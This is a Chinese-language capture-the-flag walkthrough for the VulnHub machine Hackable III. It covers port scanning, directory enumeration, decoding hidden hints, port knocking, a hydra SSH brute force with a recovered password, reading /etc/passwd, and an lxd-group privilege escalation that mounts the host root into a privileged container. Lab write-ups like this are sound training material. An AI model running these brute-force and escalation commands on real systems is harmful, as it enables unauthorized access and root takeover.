文章目录
- HACKABLE: III实战演练
- 一、前期准备
- 1、相关信息
- 二、信息收集
- 1、端口扫描
- 2、访问网站
- 3、查看网站源码
- 4、扫描目录
- 5、访问网址
- 6、查看并下载
- 7、访问网站
- 8、查看文件
- 9、解密
- 10、访问网站
- 11、访问网站
- 12、查看文件
- 13、解密
- 14、访问网站
- 15、访问网站
- 16、下载图片
- 17、隐写
- 18、敲端口并端口扫描
- 19、暴力破解
- 20、远程连接
- 三、后渗透
- 1、查看文件
- 2、查看文件
- 3、切换用户
- 四、提权
- 1、提权
- 2、访问目录
HACKABLE: III实战演练
一、前期准备
1、相关信息
靶机网站:https://www.vulnhub.com/entry/hackable-iii,720/
| 设备名称 | IP地址 |
|---|---|
| 靶机:Hackable III | 192.168.2.64 |
| 攻击机:kali | 192.168.2.22 |
二、信息收集
1、端口扫描
kali@kali:~$ nmap -A 192.168.2.64
# 开放WEB:80端口
2、访问网站
http://192.168.2.64
3、查看网站源码
# 发现用户名:jubiscleudo 邮箱:dev_suport@hackable3.com和登录界面
4、扫描目录
kali@kaliL:~$ sudo dirsearch -u "http://192.168.2.64/"
5、访问网址
http://192.168.2.64/backup/
# 发现一个Wordlist.txt
6、查看并下载
kali@kali:~$ wget "http://192.168.2.64/backup/wordlist.txt"
7、访问网站
http://192.168.2.64/config/
# 发现一个1.txt文件
8、查看文件
# 发现是Base64编码
9、解密
网址:https://base64.us/
10、访问网站
http://192.168.2.64/config.php
# 查看源代码
11、访问网站
http://192.168.2.64/css/
# 发现2.txt
12、查看文件
# 发现是Brainfuck/Ook! 编码
13、解密
网址:https://tool.bugku.com/brainfuck/
# 将密文输入至文本框,点击BrainFuckToText
14、访问网站
http://192.168.2.64/login.php
# 查看源代码,发现有一个3.jpg
15、访问网站
http://192.168.2.64/3.jpg
# 发现是一张图片
16、下载图片
kali@kali:~$ wget "http://192.168.2.64/3.jpg"
17、隐写
kali@kali:~$ steghide extract -sf 3.jpg
kali@kali:~$ cat steganopayload148505.txt
18、敲端口并端口扫描
# 通过搜集信息,寻找到了三个端口地址:10000,4444,65535,敲端口,发现22端口开放
kali@kali:~$ knock 192.168.2.64 10000 4444 65535
kali@kali:~$ nmap -A 192.168.2.64
19、暴力破解
kali@kali:~$ hydra -l jubiscleudo -P /home/kali/wordlist.txt 192.168.2.64 ssh
# 用户名:jubiscleudo 密码:onlymy
20、远程连接
kali@kali:~$ ssh jubiscleudo@192.168.2.64
三、后渗透
1、查看文件
# 在网站目录下发现新用户名
jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php
2、查看文件
# 查看系统是否存在此用户名
jubiscleudo@ubuntu20:~$ cat /etc/passwd
3、切换用户
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3
四、提权
1、提权
访问网址:https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
# 通过id显示,查找后发现lxd有相关提权方式,选择其中一种方法,
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
# before running the image, start and configure the lxd storage pool as default
lxd init
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
hackable_3@ubuntu20:~$ git clone https://github.com/saghul/lxd-alpine-builder
hackable_3@ubuntu20:~$ cd lxd-alpine-builder
hackable_3@ubuntu20:~$ sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-hackable_3@ubuntu20:~$ releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
hackable_3@ubuntu20:~$ sudo ./build-alpine -a i686
hackable_3@ubuntu20:~$ lxc image import ./alpine*.tar.gz --alias myimage
hackable_3@ubuntu20:~$ lxd init
hackable_3@ubuntu20:~$ lxc init myimage mycontainer -c security.privileged=true
hackable_3@ubuntu20:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
hackable_3@ubuntu20:~$ lxc start mycontainer
hackable_3@ubuntu20:~$ lxc exec mycontainer /bin/sh
2、访问目录
# 在mnt下发现root
